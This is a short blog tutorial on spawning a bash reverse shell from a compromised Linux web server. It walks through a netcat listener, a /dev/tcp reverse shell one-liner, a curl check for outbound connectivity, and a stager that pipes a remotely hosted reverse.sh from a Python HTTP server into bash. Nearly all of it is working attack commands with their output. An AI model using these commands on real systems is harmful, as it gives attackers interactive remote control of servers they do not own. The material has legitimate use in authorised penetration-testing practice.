Written by shakuganz

Simple reverse shell (GNU/Linux version)

Dear readers,

Sometimes we may want to spawn a reverse shell from the server we have just pawned especially a Linux web server. It seems trouble to generate a payload from msfvenom. Therefore, here is some easy bash-based reverse shell.

Setting up a listening port for incoming TCP connection

We can use netcat to listen to incoming TCP connections from the pwned server.

// Usage
$ nc -lnvp <port>
// Example
$ nc -lnvp 7337
listening on [any] 7337 ...

Based on the example above, our system will listen for incoming connections at port 7337.

Note that if you are running your system in a virtual machine, remember to configure your IP address and port forwarding if you are using NAT. To save yourself from having that hassle, use a bridge adapter instead.

Reverse shell

To create a reverse TCP shell via Bash:

// Usage
/bin/bash -c 'bash -i >& /dev/tcp/<Your IP>/<Your listening port> 0>&1'
// Example
/bin/bash -c 'bash -i >& /dev/tcp/10.10.1.1/7337 0>&1'

There are also many other reverse shells that can be received via our listening netcat by pentestmonkey which can be found here.

Reverse shell troubleshoot

There are also situations where none of the reverse shells works. To ensure that no firewall is affecting it and is just parsing issue of our reverse script code at the server-side, we can use CURL to test it:

// Usage
curl <your ip>:<your listening port>
// Example
curl 10.10.1.1:7337

If no firewall or other factors is stopping outgoing connection, your netcat should receive incoming connection as shown below:

$ nc -lvp 7337          
listening on [any] 7337 ...
192.168.1.2: inverse host lookup failed: Unknown host
connect to [10.10.1.1] from (UNKNOWN) [192.168.1.2] 29727
GET / HTTP/1.1
Host: 10.10.1.1:7337
User-Agent: curl/7.58.0
Accept: */*

Therefore, we can try to create a payload stager concept by using CURL to get a shell script, pipe the content of the shell script into bash to create a reverse shell.

In the shell script, reverse.sh:

bash -i >& /dev/tcp/10.10.1.1/7337 0>&1

Inside the same directory as the reverse.sh, launch a Python server:

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Remember to continue to run your netcat listener at port 7337 or any other port you specified.

Next, change the CURL to this (note that we are using CURL to port 8000 as our http.server from Python3 is listening for incoming connection to send file via HTTP at port 8000):

curl 10.10.1.1:8000/reverse.sh | bash

This way, CURL will fetch reverse.sh file from our system at port 8000 from our Python3 http.server, pipe the content of reverse.sh into bash which will then be executed by that bash. Thus, our netcat should be able to receive incoming connections at port 7337, obtaining an interactive reverse shell.

I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Advertisement

Leave a Reply

Please log in using one of these methods to post your comment:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.